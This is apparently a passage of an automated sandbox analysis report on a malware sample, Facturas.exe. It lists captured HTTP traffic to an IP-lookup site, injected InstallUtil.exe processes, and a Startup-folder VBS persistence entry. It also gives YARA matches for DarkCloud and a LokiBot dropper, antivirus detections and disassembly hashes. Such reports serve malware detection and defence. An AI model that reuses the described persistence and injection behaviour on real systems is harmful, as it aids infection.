Oct 25, 2024 09:12:06.154095888 CEST	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Fri, 25 Oct 2024 07:12:06 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Oct 25, 2024 09:12:06.154263020 CEST	212	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.p
Oct 25, 2024 09:12:06.154273987 CEST	1236	IN	Data Raw: 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 Data Ascii: rototype)return a;a[b]=c.value;return a}; function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(
Oct 25, 2024 09:12:06.154645920 CEST	1236	IN	Data Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 20 20 20 20 20 20 76 61 72 20 6e 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 Data Ascii: rguments.length;c++)b[c-a]=arguments[c];return b} var na="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(
Oct 25, 2024 09:12:06.154659033 CEST	1236	IN	Data Raw: 79 6d 62 6f 6c 28 29 3a 76 6f 69 64 20 30 2c 47 3d 46 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 46 5d 7c 3d 62 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 6f 69 64 20 30 21 3d 3d 61 2e 67 3f 61 2e 67 7c 3d 62 3a 4f 62 6a 65 63 74 Data Ascii: ymbol():void 0,G=F?function(a,b){a[F]\|=b}:function(a,b){void 0!==a.g?a.g\|=b:Object.defineProperties(a,{g:{value:b,configurable:!0,writable:!0,enumerable:!1}})};function va(a){var b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.
Oct 25, 2024 09:12:06.155261040 CEST	1236	IN	Data Raw: 31 30 32 33 29 3c 3c 31 31 3b 62 72 65 61 6b 20 61 7d 7d 62 26 26 28 67 3d 28 64 3e 3e 39 26 31 29 2d 31 2c 62 3d 4d 61 74 68 2e 6d 61 78 28 62 2c 65 2d 67 29 2c 31 30 32 34 3c 62 26 26 28 7a 61 28 63 2c 67 2c 7b 7d 29 2c 64 7c 3d 32 35 36 2c 62 Data Ascii: 1023)<<11;break a}}b&&(g=(d>>9&1)-1,b=Math.max(b,e-g),1024<b&&(za(c,g,{}),d\|=256,b=1023),d=d&-2095105\|(b&1023)<<11)}}I(a,d);return a} function za(a,b,c){for(var d=1023+b,e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.len
Oct 25, 2024 09:12:06.155272961 CEST	600	IN	Data Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 62 26 32 35 36 3f 61 5b 64 2d 31 5d 3a 76 6f 69 64 20 30 3b 64 2b 3d 65 3f 2d 31 3a 30 3b 66 6f 72 28 62 3d 62 26 35 31 Data Ascii: .prototype.slice.call(a);var d=a.length,e=b&256?a[d-1]:void 0;d+=e?-1:0;for(b=b&512?1:0;b<d;b++)a[b]=c(a[b]);if(e){b=a[b]={};for(var f in e)Object.prototype.hasOwnProperty.call(e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a)
Oct 25, 2024 09:12:06.155282974 CEST	1236	IN	Data Raw: 44 61 28 61 5b 68 5d 2c 62 2c 63 2c 64 2c 65 2c 66 29 3b 63 26 26 63 28 67 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 46 61 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 73 3d 3d 3d 4d 3f 61 2e 74 6f 4a 53 4f 4e 28 29 3a 41 61 28 Data Ascii: Da(a[h],b,c,d,e,f);c&&c(g,a);return a}function Fa(a){return a.s===M?a.toJSON():Aa(a)};function Ga(a,b,c){c=void 0===c?K:c;if(null!=a){if(ta&&a instanceof Uint8Array)return b?a:new Uint8Array(a);if(Array.isArray(a)){var d=H(a);if(d&2)return a;i
Oct 25, 2024 09:12:06.156208992 CEST	1236	IN	Data Raw: 26 26 49 28 67 2c 6b 29 3b 63 3d 6e 65 77 20 63 28 67 29 7d 65 6c 73 65 20 63 3d 76 6f 69 64 20 30 3b 65 6c 73 65 20 63 3d 67 3b 63 21 3d 3d 67 26 26 6e 75 6c 6c 21 3d 63 26 26 4b 61 28 65 2c 66 2c 62 2c 63 2c 64 29 3b 65 3d 63 3b 69 66 28 6e 75 Data Ascii: &&I(g,k);c=new c(g)}else c=void 0;else c=g;c!==g&&null!=c&&Ka(e,f,b,c,d);e=c;if(null==e)return e;a=a.h;f=J(a);f&2\|\|(g=e,c=g.h,h=J(c),g=h&2?Q(g.constructor,Ha(c,h,!1)):g,g!==e&&(e=g,Ka(a,f,b,e,d)));return e}function Na(a,b){a=Ia(a,b);return nul
Oct 25, 2024 09:12:06.156219959 CEST	424	IN	Data Raw: 26 61 21 3d 61 26 26 28 63 3d 21 30 29 2c 6e 75 6c 6c 21 3d 61 3f 65 5b 63 61 5d 3d 61 3a 63 3d 21 30 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 72 62 20 69 6e 20 65 29 7b 79 3d 65 3b 62 72 65 61 6b 20 61 7d 79 3d 6e 75 6c 6c 7d 7d 79 21 3d Data Ascii: &a!=a&&(c=!0),null!=a?e[ca]=a:c=!0);if(c){for(var rb in e){y=e;break a}y=null}}y!=h&&(Ca=!0);d--}for(;0<d;d--){h=b[d-1];if(null!=h)break;var cb=!0}if(!Ca&&!cb)return b;var da;f?da=b:da=Array.prototype.slice.call(b,0,d);b=da;f&&(b.length=d);y&&
Oct 25, 2024 09:12:06.160324097 CEST	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49791	162.55.60.2	80	7444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:12:30.073005915 CEST	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Oct 25, 2024 09:12:30.955615044 CEST	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Fri, 25 Oct 2024 07:12:30 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Oct 25, 2024 09:12:30.955734015 CEST	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Oct 25, 2024 09:12:30.955750942 CEST	1236	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
Oct 25, 2024 09:12:30.956016064 CEST	388	IN	Data Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20 Data Ascii: ge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
Oct 25, 2024 09:12:30.956033945 CEST	1236	IN	Data Raw: 61 72 20 62 3d 48 28 61 29 3b 31 21 3d 3d 28 62 26 31 29 26 26 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c Data Ascii: ar b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b\|1))} var H=F?function(a){return a[F]\|0}:function(a){return a.g\|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a
Oct 25, 2024 09:12:30.956049919 CEST	1236	IN	Data Raw: 65 3d 61 2e 6c 65 6e 67 74 68 2c 66 3d 64 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 6e 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d Data Ascii: e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a i
Oct 25, 2024 09:12:30.956063032 CEST	1236	IN	Data Raw: 28 65 2c 66 29 26 26 28 62 5b 66 5d 3d 63 28 65 5b 66 5d 29 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 Data Ascii: (e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=D
Oct 25, 2024 09:12:30.956080914 CEST	1236	IN	Data Raw: 66 28 63 3e 3d 66 7c 7c 65 29 7b 65 3d 62 3b 69 66 28 62 26 32 35 36 29 66 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 64 29 72 65 74 75 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d Data Ascii: f(c>=f\|\|e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e\|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c
Oct 25, 2024 09:12:30.956820011 CEST	848	IN	Data Raw: 72 65 61 6b 7d 66 3d 21 30 7d 65 3d 62 3b 63 3d 21 63 3b 67 3d 4a 28 61 2e 68 29 3b 61 3d 4c 28 67 29 3b 67 3d 28 67 3e 3e 39 26 31 29 2d 31 3b 66 6f 72 28 76 61 72 20 68 2c 6b 2c 77 3d 30 3b 77 3c 64 2e 6c 65 6e 67 74 68 3b 77 2b 2b 29 69 66 28 Data Ascii: reak}f=!0}e=b;c=!c;g=J(a.h);a=L(g);g=(g>>9&1)-1;for(var h,k,w=0;w<d.length;w++)if(k=d[w],k<a){k+=g;var r=e[k];null==r?e[k]=c?O:wa():c&&r!==O&&va(r)}else h\|\|(r=void 0,e.length&&N(r=e[e.length-1])?h=r:e.push(h={})),r=h[k],null==h[k]?h[k]=c?O:wa(
Oct 25, 2024 09:12:30.956840992 CEST	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())
Oct 25, 2024 09:12:30.961184978 CEST	1236	IN	Data Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu

Target ID:	0
Start time:	03:12:01
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\Facturas.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Facturas.exe"
Imagebase:	0xa00000
File size:	1'189'888 bytes
MD5 hash:	AF60907E3D43618D4DB0730AEF26E7DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1260940324.0000000005B70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:12:02
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x760000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:12:14
Start date:	25/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"
Imagebase:	0x7ff648130000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:12:15
Start date:	25/10/2024
Path:	C:\Users\user\AppData\Roaming\Id.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Id.exe"
Imagebase:	0x580000
File size:	1'189'888 bytes
MD5 hash:	AF60907E3D43618D4DB0730AEF26E7DD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.1411737595.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:12:16
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xa00000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 0657EBA0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dq, xrefs: 0657ECA5

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID: Dq
API String ID: 0-144822681
Opcode ID: c556d932b7565851b8ce31b069533b0b47383ac424f44c4695e74e9b751ee258
Instruction ID: 8cefd335d257b490cdc87e0bbf5909d331ce154f0d298c69abcd1fe029d0480f
Opcode Fuzzy Hash: c556d932b7565851b8ce31b069533b0b47383ac424f44c4695e74e9b751ee258
Instruction Fuzzy Hash: 29D19F74E01218CFDB54DFA9D994B9DBBB2FF89300F2085A9D409AB365DB31A981CF50

Function 02D8FBA8 Relevance: 4.1, Strings: 3, Instructions: 308COMMON

Download Yara Rule

Strings

Plq, xrefs: 02D8FD90
(q, xrefs: 02D8FEC6
(q, xrefs: 02D8FE9A

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: (q$(q$Plq
API String ID: 0-3768043887
Opcode ID: 82cbd2e8cf647b20882132c2d15803ba53c790a31476b3f351d460fec66dc6f5
Instruction ID: 56672fb1c905a3cf11f19ae672bac5de19ffbbbea1cacb979b936887e5d6d9b1
Opcode Fuzzy Hash: 82cbd2e8cf647b20882132c2d15803ba53c790a31476b3f351d460fec66dc6f5
Instruction Fuzzy Hash: FEB12730B002148FDB14EF69D484BAEB7F6FF89614B5444A9E505DB3A1DB31ED06CBA1

Function 02D8F420 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_q, xrefs: 02D8F6B0

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: f26857467b4dbf48884e65371a1a7a9ba98a2b05c5b4bd5255f47771b8908a73
Instruction ID: 91d7927a768519ec01640b1dc4aac084bb114a1e307b1edb7818d39d35ef81fd
Opcode Fuzzy Hash: f26857467b4dbf48884e65371a1a7a9ba98a2b05c5b4bd5255f47771b8908a73
Instruction Fuzzy Hash: EA228D35B102059FDB14EFA8D494AADBBB6FF88314F548069E906EB3A5CB71ED40CB50

Function 02D82902 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

, xrefs: 02D82A8A

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 033e30a8bb3e36e705b4674328dcb2056a9f3fd2806ee9743299e2ede2f96a0f
Instruction ID: d26861ec21aacd240ce0c4e56b81c6163f0ff8f53c3d64869b08a19fbbc06686
Opcode Fuzzy Hash: 033e30a8bb3e36e705b4674328dcb2056a9f3fd2806ee9743299e2ede2f96a0f
